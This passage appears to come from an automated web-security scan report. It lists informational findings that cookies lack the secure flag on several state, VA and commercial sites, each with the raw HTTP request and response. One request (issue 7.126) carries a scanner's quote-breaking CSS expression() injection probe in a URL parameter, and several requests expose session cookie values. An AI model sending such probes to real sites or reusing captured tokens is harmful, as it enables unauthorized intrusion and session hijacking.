Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=452 t=1304124361848208
RNT-Machine: 05
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=e74f57f44182b7718c23ae70d70012842a9902cf448e753e4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 2504

/*
File............: /va_files/styles/va-user-styles.css
Description.....: Styles available for use in the page content area
Version.........: 1.0
Release Date....: December 19, 2005
*/

...[SNIP]...

7.119. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/assets/css/2009/vaSearch.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/assets/css/2009/vaSearch.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:01 GMT
RNT-Time: D=853 t=1304124361876499
RNT-Machine: 02
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=e01496e8a2ad5c95c6c9bd60023271e0ae202d966e68cbd74dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 1752

/* CSS Document */
#search-area {
   text-align: right;
   float:right;
}

#search-area form {
margin: 0px;
padding: 0px;
}

/* hide the label for the main input field */
#mainSearchForm l
...[SNIP]...

7.120. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:01 GMT
Last-Modified: Thu, 14 Apr 2011 17:22:11 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Mon, 30 May 2011 00:46:01 GMT
RNT-Time: D=1790 t=1304124361295257
RNT-Machine: 01
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=232a6f61fd5d037daba9afae047adde2e1323d437019bcac4dbb5bc9; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 18647

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{margin:0;padding:0;*z-index:1;}
table{border-collapse:collapse;border-spacing:0;}
fieldset,
...[SNIP]...

7.121. https://iris.custhelp.com/rnt/rnw/css/enduser.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/css/enduser.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/css/enduser.css HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:04 GMT
Last-Modified: Sun, 09 Jan 2011 05:13:20 GMT
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:04 GMT
RNT-Time: D=465 t=1304124364543617
RNT-Machine: 02
X-Cnection: close
Content-Type: text/css
Set-Cookie: TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc; Max-Age=900; Path=/
Connection: Keep-Alive
Content-Length: 9807

/* --------------------------------------------------------------------------
*
* RNW Enduser Interface Stylesheet (enduser.css)
*
*/


a.fcn
{ text-decoration: none; color: black }
a.fcn:visited
...[SNIP]...

7.122. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/img/enduser/2009/img-bullet.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/img/enduser/2009/img-bullet.gif HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/app/answers/detail/a_id/936/session/L3RpbWUvMTMwNDEyNDM1OS9zaWQvUlBRT3NLc2s%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6; cp_session=aUikFgcgagxbyNc6bBtpeAQnz7CbRGl0HlRzZw2K1u6edMsf05RsqY6Jl_TQ7FD8V8UJLcPs38AKjZaz9yZMFx2WW_4hETSJaa8SWL6Gai4cTEyE37ZS91mPSrHyisikTcaqGGB7D4rm_I8eWdX2vRnCdn0jquco1jHNqXYnB9pLAHxc_Mv7Sq_J5b8jggGTmw9bepkVPoknY%21; TS8118ae=fc55d15bba74fd0fe00178b9b0b1faef85ea932776fb04994dbb5bcc

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:36 GMT
Last-Modified: Sun, 09 Jan 2011 05:13:56 GMT
Accept-Ranges: bytes
Content-Length: 73
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:14:36 GMT
RNT-Time: D=420 t=1304125176794949
RNT-Machine: 04
X-Cnection: close
Content-Type: image/gif
Set-Cookie: TS8118ae=6c3373cb5cc5ffbbcc089968f4a020a385ea932776fb04994dbb5ef8; Max-Age=900; Path=/

GIF89a..........ww....DD|..M.........!.......,...........H.C.0.....E.H..;

7.123. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.custhelp.com
Path:   /rnt/rnw/javascript/2009/global.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rnt/rnw/javascript/2009/global.js HTTP/1.1
Host: iris.custhelp.com
Connection: keep-alive
Referer: https://iris.custhelp.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1; cp_session=aUxqbSmDTF9zJzhBJfb1F92LWC0Kf6M_chBVcBdbVsBdRhTE4dyBudDel3PBTMCcbt0G5M4_5w9JcZdV4VybHjLGNcGrrzNw5hbxYIGFEGupqUcu8pKx88tHF%7EKERiv3JVy5NkYDf%7Ew_LkB2Yurou0ES9QOGtwgf_w; TS2744aa=cc7e1e5c7e26af0307fed34a81cbc2ae25ed35bd7c0894804dbb5bc6

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:03 GMT
Last-Modified: Wed, 16 Mar 2011 01:07:55 GMT
Accept-Ranges: bytes
Content-Length: 462
Cache-Control: max-age=900
Expires: Sat, 30 Apr 2011 01:01:03 GMT
RNT-Time: D=795 t=1304124363945766
RNT-Machine: 01
X-Cnection: close
Content-Type: application/x-javascript
Set-Cookie: TS8118ae=825257ac4c5eed1a6ecc18140b79cd7374eb092c0fc3ce704dbb5bcb; Max-Age=900; Path=/

document.write('<script type="text/javascript" src="/rnt/rnw/javascript/2009/jquery-min-modified.js"></script>');
document.write('<script type="text/javascript" src="/rnt/rnw/javascript/2009/jquery-b
...[SNIP]...

7.124. https://iris.va.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://iris.va.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: iris.va.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290","pv":2,"to":5,"c":"http://www.va.gov/landing2_contact.htm","lc":{"d2":{"v":2,"s":false}},"cd":2,"sd":2,"f":1304124227976}

Response

HTTP/1.0 302 Found
Location: http://www.va.gov/iris/home.html
Connection: Keep-Alive
Content-Length: 0
Set-Cookie: TS37e6d1=4bcb8063f21d061f51ef1c3a60441adf25cdfae3e9bf86364dbb5be2; Max-Age=900; Path=/


7.125. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:22:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=5331d115efba8054:TM=1304166134:LM=1304166134:S=3lC6GeKYBlhC1NHB; expires=Mon, 29-Apr-2013 12:22:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

7.126. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:11 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:39:11 GMT
RNT-Time: D=82489 t=1304111951723725
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...

7.127. https://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc HTTP/1.1
Host: pixel.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 21:18:47 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: uid=1_1304111927_1304111927683:2889978505427215; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: kwd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: sit=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: cre=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: bpd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: apd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: scg=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: ppd=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Set-Cookie: afl=1_1304111927; Domain=.fetchback.com; Expires=Wed, 27-Apr-2016 21:18:47 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Fri, 29 Apr 2011 21:18:47 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- site #0 *not* found -->

7.128. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/start.swe

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eservice_enu/start.swe?SWECmd=Start&SWEHo=treas-secure.treas.state.mi.us HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: https://treas-secure.treas.state.mi.us/eservice_enu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:40:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: no-cache, must-revalidate
pragma: no-cache
content-language: en
cache-control: no-cache
content-type: text/html;charset=UTF-8
set-cookie: _sn=uoRphRmFTo3vYJBLemQjcVt09QdVGoaxoByAcCEw0vk_; Version=1; Path=/eservice_enu
Content-Length: 1403

<html OT='SiebWebMainWindow'>
<head>
<title>Michigan Department of Treasury Self Service</title>
<script language="javascript">navigator.id = "1304127646";</script></head>
<script language="javascript
...[SNIP]...

7.129. https://www.accesskansas.org/dissolutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /dissolutions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dissolutions/ HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: http://www.kansas.gov/services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; Path=/dissolutions; Secure
Location: https://www.accesskansas.org/dissolutions/index.do
Content-Type: text/html
Content-Length: 0
Date: Sat, 30 Apr 2011 11:22:44 GMT
Set-Cookie: BIGipServerAPTCS03=755898796.38943.0000; path=/


7.130. https://www.accesskansas.org/images/footer_images/current_year.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /images/footer_images/current_year.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_images/current_year.gif HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Tue, 06 Jan 2009 16:40:52 GMT
ETag: "2f1813-ef-12068d00"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerSEC-01=UiP2oqvMWLFtQTBi2/r4yXnQdKxpymiHQxW5p15RiBdLKNOswst6hiCyiQ9SvAZ/FIiyd+KqkE3aTw==; path=/

GIF89a$.......................................}}}qqqiiieee...!.......,....$........I..........$(..Qp.at..p.1........Do.P N9......3.C.@.4.....!4.F...@..[.z...g...A..........J.j.'..
ZU/._[
.)wc    ..t..g
...[SNIP]...

7.131. https://www.accesskansas.org/images/footer_images/from2002.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /images/footer_images/from2002.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/footer_images/from2002.gif HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Thu, 02 Feb 2006 21:37:47 GMT
ETag: "2f181a-24b-9b8600c0"
Accept-Ranges: bytes
Content-Length: 587
Connection: close
Content-Type: image/gif
Set-Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; path=/

GIF89a.......fff......fff....................................!.......,.............I..8.....!.di.h..l..-..t..E.(vo..^..b$...K`..
.V a`....R.....(
XR.$.f.4,

&.\E=.
...aM9....}......"9    .    c&..MO.".<....
...[SNIP]...

7.132. https://www.accesskansas.org/kbc/img/icons/external.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /kbc/img/icons/external.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kbc/img/icons/external.png HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: https://www.accesskansas.org/dissolutions/index.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:48 GMT
Server: Apache
Last-Modified: Mon, 22 Dec 2008 02:31:46 GMT
ETag: "371c91-a5-75c9a880"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: image/png
Set-Cookie: BIGipServerSEC-01=CuIKV2PaOP4+1R5i2/r4yXnQdKxpyqfPixcLrxUNYSCyofOc40Dn2AT3Kw0YEgISMQ8Cd9qH/YjvbeM=; path=/

.PNG
.
...IHDR...
...
.......?.....PLTEf..3......f..f.......D.......tRNS........K.F...8IDAT.W%.A..@..A"..O...T.$....x.l...:r......B.......!./..Y.....5f....IEND.B`.

7.133. https://www.alabamainteractive.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcZcJfPy2b9VciC3-J_s

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:25:32 GMT
Server: Apache/1.3.41 (Unix)
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: alabamainteractive.org=1141440522.47873.0000; path=/
Content-Length: 205

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
</BODY></H
...[SNIP]...

7.134. https://www.bbb.org/online/consumer/cks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Set-Cookie: BBB_Cookie=3886160556.20480.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...

7.135. https://www.colorado.gov/apps/feedback/servlet/begin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.colorado.gov
Path:   /apps/feedback/servlet/begin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/feedback/servlet/begin HTTP/1.1
Host: www.colorado.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
